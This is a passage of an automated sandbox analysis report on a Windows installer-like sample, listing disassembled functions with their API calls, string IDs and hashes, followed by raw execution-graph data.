                                      • Part of subcall function 6C185F0F: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6C185EAB,6C184B3E,6C17B0D0,?,6C17C286,?,?,6C17B0D0,?), ref: 6C185F22
                                    • WriteConsoleW.KERNEL32(00000000,?,6C1846EC,00000000,?,6C184B51,00000000,00000001,00000000,6C17B0D0,?,6C17C286,?,?,6C17B0D0,?), ref: 6C185F02
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                     • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                    • String ID:
                                    • API String ID: 2744216297-0
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 6C19E077
                                      • Part of subcall function 6C19DFF5: __EH_prolog.LIBCMT ref: 6C19DFFA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                     • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID: :$\
                                    • API String ID: 3519838083-1166558509
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                     • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: H_prolog__aullrem
                                    • String ID: d%K
                                    • API String ID: 3415659256-3110269457
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                     • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: H_prolog3_
                                    • String ID: 8Q
                                    • API String ID: 2427045233-4022487301
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                     • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID: @$hfJ
                                    • API String ID: 3519838083-1391159562
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 6C1B8C5D
                                      • Part of subcall function 6C1B761A: __EH_prolog.LIBCMT ref: 6C1B761F
                                      • Part of subcall function 6C1B7A2E: __EH_prolog.LIBCMT ref: 6C1B7A33
                                      • Part of subcall function 6C1B8EA5: __EH_prolog.LIBCMT ref: 6C1B8EAA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                     • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID: WZJ
                                    • API String ID: 3519838083-1089469559
                                    APIs
                                    • ___std_exception_destroy.LIBVCRUNTIME ref: 6C032A76
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                     • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: ___std_exception_destroy
                                    • String ID: Jbx$Jbx
                                    • API String ID: 4194217158-1161259238
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                     • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID: <dJ$Q
                                    • API String ID: 3519838083-2252229148
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                     • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID: $D^J
                                    • API String ID: 3519838083-3977321784
                                    APIs
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,6C1846D6), ref: 6C17D01B
                                    • __dosmaperr.LIBCMT ref: 6C17D022
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                     • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: ErrorLast__dosmaperr
                                    • String ID: 8Q
                                    • API String ID: 1659562826-4022487301
                                    • Opcode ID: c14c5f33b27b218701a954a94ab3e730b0b3dcb615ce56c251c7be87f0cb26f8
                                    • Instruction ID: d2e7cb2f7036843b40a7286fe23a6f3889cd11b643f51f5aa18065dca350ec2d
                                    • Opcode Fuzzy Hash: c14c5f33b27b218701a954a94ab3e730b0b3dcb615ce56c251c7be87f0cb26f8
                                    • Instruction Fuzzy Hash: A341A931604198AFD731AF2DC8A0BA97FE0EF46304F248299E8808B642D3719D12C7B0
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                     • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID: X&L$p|J
                                    • API String ID: 3519838083-2944591232
                                    • Opcode ID: 9119c1f64bb26ad996fbea7536e901d29dd4483baa18a121855aa129662547ca
                                    • Instruction ID: e24a43578ee59fe1c27bf943390f89f3c5c4b6d304d3ffaf0216c4e82156f2e4
                                    • Opcode Fuzzy Hash: 9119c1f64bb26ad996fbea7536e901d29dd4483baa18a121855aa129662547ca
                                    • Instruction Fuzzy Hash: 76313EB5A95105CBD7109B5CDD01FEE7771EB32728F130226D512A6EE0CB60B589CA51
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                     • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID: 0|J$`)L
                                    • API String ID: 3519838083-117937767
                                    • Opcode ID: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                                    • Instruction ID: a3dd5dce47430b4d52f6d5ea962c68b9b60fddad2412c9d6ab785174cd100ba0
                                    • Opcode Fuzzy Hash: 924921a2771934cbe07cb1819a4d5bd42f54cfcb7b164b76471555bcaac8b42b
                                    • Instruction Fuzzy Hash: 37419071605B85EFDB118F64C4A0BEABBE2FF55208F01442EE45A97750CB357909CB92
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                     • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: __aulldiv
                                    • String ID: 3333
                                    • API String ID: 3732870572-2924271548
                                    • Opcode ID: 0d34d547a1763b1f6cbcb81569cbe66ca114cba913daa42be50c89cb46dd64ee
                                    • Instruction ID: f631717390c0a15f6601f6e62b524a40eac0f5b0e83dd8944a9884acc02ca540
                                    • Opcode Fuzzy Hash: 0d34d547a1763b1f6cbcb81569cbe66ca114cba913daa42be50c89cb46dd64ee
                                    • Instruction Fuzzy Hash: E62158B1900748AED7308FA98980B6BBBFDEB54B54F10891FA146D7B40D770E9448B65
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                     • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: _free
                                    • String ID: dU&l$hU&l
                                    • API String ID: 269201875-241561095
                                    • Opcode ID: f66853145b4581f96f089f0c2d514841fe23822ecabe7f6351488bebe6ac645b
                                    • Instruction ID: f713e14429265d763a591727582589889430413bd4afb8ef3442d0e0401a4752
                                    • Opcode Fuzzy Hash: f66853145b4581f96f089f0c2d514841fe23822ecabe7f6351488bebe6ac645b
                                    • Instruction Fuzzy Hash: 3F1193712043019BE7208F6AD495B82B7E4EB15358F30442FE499D7F80EB71E9868BB0
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                     • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID: @$LuJ
                                    • API String ID: 3519838083-205571748
                                    • Opcode ID: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                                    • Instruction ID: 6779f2cb157e26dc4f17bbf9527aa2e98c58c6b3c6f8de7c1c1ae427de066c20
                                    • Opcode Fuzzy Hash: aa36ca613ac24c818774a3b50af302aa3ac6c7e5dc6eeb3b6f96232f2efdcf83
                                    • Instruction Fuzzy Hash: F50184B1E01349DADB14DFE988906AEF7B4FF65304F81842EE569E3A40C3746905CB59
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                     • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID: @$xMJ
                                    • API String ID: 3519838083-951924499
                                    • Opcode ID: 871999b8a6dfe8dd14063548d73ca1d86140603a6c3ba165e22a59db3157078a
                                    • Instruction ID: 98a18e1743387d2b246b10ba32469548beb916c01d937d6320e3bf9099b0497b
                                    • Opcode Fuzzy Hash: 871999b8a6dfe8dd14063548d73ca1d86140603a6c3ba165e22a59db3157078a
                                    • Instruction Fuzzy Hash: CF117C75A00309DBCB00DFD9C4A059EB7B4FF59348B50C42ED469E7700D3399A06CB95
                                    APIs
                                    • _free.LIBCMT ref: 6C17DD49
                                    • HeapReAlloc.KERNEL32(00000000,?,?,00000004,00000000,?,6C17A63A,?,00000004,?,4B42FCB6,?,?,6C16F78C,4B42FCB6,?), ref: 6C17DD85
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                     • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: AllocHeap_free
                                    • String ID: 8Q
                                    • API String ID: 1080816511-4022487301
                                    • Opcode ID: 86c7428a64efb91e8972a1227cf3f6d56d9660bd3dc7ab9aebdf0103cafb9a1b
                                    • Instruction ID: 8a71dada1e258171a0a5fac8b5eba6551b6369f53488c88decb7c6cc5252b4d0
                                    • Opcode Fuzzy Hash: 86c7428a64efb91e8972a1227cf3f6d56d9660bd3dc7ab9aebdf0103cafb9a1b
                                    • Instruction Fuzzy Hash: 4DF0C23220120D6ADB312A67DD44B9A3B689F93BB8B224125E9249BED0DF24C401C5F0
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                     • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: H_prologctype
                                    • String ID: |zJ
                                    • API String ID: 3037903784-3782439380
                                    • Opcode ID: 45f9250e3087bdd449dea7a7c5ec79293aeb189375d795e63a98390aaf881842
                                    • Instruction ID: 2ac14493cb4196faffc69955922cdffe02d363b6fc64b278140def989b39499b
                                    • Opcode Fuzzy Hash: 45f9250e3087bdd449dea7a7c5ec79293aeb189375d795e63a98390aaf881842
                                    • Instruction Fuzzy Hash: 26E06572616520DBE7158F49D8107EDF3B8FF54B15F52401F9416A7A41CBB5B806C781
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                     • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: H_prologctype
                                    • String ID: <oJ
                                    • API String ID: 3037903784-2791053824
                                    • Opcode ID: f66cbee60b40af54c04d64295f8ed3aa4e69c018a581ef3e0b0762c85e8ebc26
                                    • Instruction ID: f9494cb93bcc508036b18e8029d74f0d0752a36f64ff099fe2f386ec46cd4f9b
                                    • Opcode Fuzzy Hash: f66cbee60b40af54c04d64295f8ed3aa4e69c018a581ef3e0b0762c85e8ebc26
                                    • Instruction Fuzzy Hash: FAE06D32B155209FDB059F49D820BEEF7A8EF66B24F11011FE025A7B51CBB5A8108686
                                    APIs
                                    • AcquireSRWLockExclusive.KERNEL32(6C26466C,?,?,652EF5AA,6C0322D8,6C26430C), ref: 6C166AB9
                                    • ReleaseSRWLockExclusive.KERNEL32(6C26466C), ref: 6C166AF3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1956303089.000000006BFE1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BFE0000, based on PE: true
                                     • Associated: 00000006.00000002.1956187849.000000006BFE0000.00000002.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1957894620.000000006C188000.00000002.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1959973284.000000006C352000.00000002.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID: ExclusiveLock$AcquireRelease
                                    • String ID: lF&l
                                    • API String ID: 17069307-2742667394
                                    • Opcode ID: 9cb45ed7e234b41914b910ab7dedd47f276245fbc7947b357a91af9e3f4f7fb4
                                    • Instruction ID: b0499250aa128eda1ed64a2b8d01a33906fe904d77c6a82df674cd066fdc57c0
                                    • Opcode Fuzzy Hash: 9cb45ed7e234b41914b910ab7dedd47f276245fbc7947b357a91af9e3f4f7fb4
                                    • Instruction Fuzzy Hash: CBF0A735240508DBC710DF1AD404A65B7B4FB47335F15822DE8A583FD0C7341852CA62
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                     • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: @ K$DJ$T)K$X/K
                                    • API String ID: 0-3815299647
                                    • Opcode ID: c2360a40d33ebeca7632374cab2a44736fbf981b028df34ec032509b6de52aa1
                                    • Instruction ID: ff9711c287737129bac42ad3da2a91076e6cb7f088b2bec9e928b339d0c2bed7
                                    • Opcode Fuzzy Hash: c2360a40d33ebeca7632374cab2a44736fbf981b028df34ec032509b6de52aa1
                                    • Instruction Fuzzy Hash: 7891D0346053059BCB04DFA4C4A07EEB3F2AF5130CF148919C87A5BB85DBBAA94BCB51
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1957970030.000000006C198000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C198000, based on PE: true
                                     • Associated: 00000006.00000002.1958671660.000000006C263000.00000004.00000001.01000000.00000009.sdmp
                                     • Associated: 00000006.00000002.1958819705.000000006C269000.00000020.00000001.01000000.00000009.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6bfe0000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: D)K$H)K$P)K$T)K
                                    • API String ID: 0-2262112463
                                    • Opcode ID: 9be5c025380eda7c216aac381ad020450c93343e5c05b53f9846b5bc651498f8
                                    • Instruction ID: c09d8e90e74499ab6410acbd19ffc8966bb1c425b9ce8750829c5703b1a0d383
                                    • Opcode Fuzzy Hash: 9be5c025380eda7c216aac381ad020450c93343e5c05b53f9846b5bc651498f8
                                    • Instruction Fuzzy Hash: 5D51E33090420A9FDF01CF94D950BEEB7F5EF1531CF10445AE82967A80DB79995ACB91

                                    Execution Graph

                                     Execution Coverage: 4%
                                     Dynamic/Decrypted Code Coverage: 0%
                                     Signature Coverage: 0.3%
                                     Total number of Nodes: 2000
                                     Total number of Limit Nodes: 30
73686->73689 73687->73686 73767 a05d8c 73687->73767 73693 a05e41 73689->73693 73694 a05de7 73689->73694 73689->73767 73695 a07140 7 API calls 73690->73695 73690->73767 73692 a05cf5 73701 9f2fec 3 API calls 73692->73701 73692->73736 73697 a05eb0 73693->73697 73988 a04115 VariantClear _CxxThrowException __EH_prolog 73693->73988 73985 a06b5e 69 API calls 2 library calls 73694->73985 73695->73767 73700 9f1e0c ctype 2 API calls 73697->73700 73699 a061fa 74006 9f1e40 free 73699->74006 73704 a05d0c 73701->73704 73702 a05e01 73980 9f1089 malloc _CxxThrowException free _CxxThrowException 73704->73980 73711 a05d16 73718->73602 73720 a05e6e 73720->73697 73720->73767 73736->73677 73736->73678 74005 9f1e40 free 73767->74005 73768->73590 73769->73590 73770->73587 73772 a136f4 __EH_prolog 73771->73772 73773 9f2e04 2 API calls 73772->73773 73774 a1370a 73773->73774 73775 a13736 73774->73775 74165 9f1089 malloc _CxxThrowException free _CxxThrowException 73774->74165 74166 9f31e5 malloc _CxxThrowException free _CxxThrowException 73774->74166 73776 9f2f1c 2 API calls 73775->73776 73779 a13742 73776->73779 74164 9f1e40 free 73779->74164 73781 a06633 73781->73598 73781->73603 73782 9f1089 malloc _CxxThrowException free _CxxThrowException 73781->73782 73782->73603 73783->73598 73784->73602 73786 a18fae __EH_prolog 73785->73786 73819 a17ebb 73786->73819 73792 a19020 73801 a06302 73792->73801 73827 9f2fec 73792->73827 73796 a191b0 73842 a18b9c 10 API calls 2 library calls 73796->73842 73797 a19244 73844 9f43b7 5 API calls 2 library calls 73797->73844 73800 a19144 73803 a1917b 73800->73803 73836 9f2f88 73800->73836 73801->73574 73801->73576 73801->73602 73803->73796 73803->73797 73804 a19100 73807 9f965d VariantClear 73804->73807 73805 a190d6 73805->73804 73809 a190e7 73805->73809 73835 a18f2e 9 API calls 73805->73835 73806 a1904d 73806->73800 73806->73801 73806->73804 73806->73805 73834 9f3097 malloc _CxxThrowException free SysStringLen ctype 73806->73834 73807->73801 73813 9f965d 
VariantClear 73809->73813 73810 a191c0 73810->73801 73812 9f2f88 3 API calls 73810->73812 73817 a191ff 73812->73817 73813->73800 73814 a19112 73814->73804 73815 a18b64 VariantClear 73814->73815 73816 a19123 73815->73816 73816->73804 73816->73809 73817->73801 73843 9f50ff free ctype 73817->73843 73820 a17ee4 73819->73820 73822 a17ec6 73819->73822 73823 a18b64 73820->73823 73821 9f1e40 free ctype 73821->73822 73822->73820 73822->73821 73824 a18b05 VariantClear 73823->73824 73825 a18b6f 73824->73825 73825->73801 73826 a18f2e 9 API calls 73825->73826 73826->73792 73828 9f2ffc 73827->73828 73832 9f2ff8 73827->73832 73829 9f1e0c ctype malloc _CxxThrowException 73828->73829 73828->73832 73830 9f3010 73829->73830 73831 9f1e40 ctype free 73830->73831 73831->73832 73832->73806 73833 a18b80 VariantClear 73832->73833 73833->73806 73834->73805 73835->73814 73837 9f2f9a 73836->73837 73837->73837 73838 9f2fbe 73837->73838 73839 9f1e0c ctype malloc _CxxThrowException 73837->73839 73838->73803 73840 9f2fb4 73839->73840 73841 9f1e40 ctype free 73840->73841 73841->73838 73842->73810 73843->73801 73844->73801 73845->73614 73846->73624 73847->73629 73848->73632 73849->73637 73850->73645 73851->73627 73852->73627 73853->73644 73854->73644 73855->73646 73856->73652 73857->73618 73859 a054ca __EH_prolog 73858->73859 73860 9f965d VariantClear 73859->73860 73863 a05507 73859->73863 73865 a05528 73860->73865 73861 9f965d VariantClear 73862 a05567 73861->73862 73862->73662 73862->73718 73863->73861 73864 a05572 73866 9f965d VariantClear 73864->73866 73865->73863 73865->73864 73867 a0558e 73866->73867 74007 a04cac VariantClear __EH_prolog 73867->74007 73869 a055a1 73869->73862 74008 a04cac VariantClear __EH_prolog 73869->74008 73871 a055b8 73871->73862 74009 a04cac VariantClear __EH_prolog 73871->74009 73875 a0563a __EH_prolog 73873->73875 73876 a05679 73875->73876 74010 a13558 10 API calls 2 library calls 73875->74010 73877 9f2f1c 2 API calls 73876->73877 73893 a0571a 73876->73893 73878 
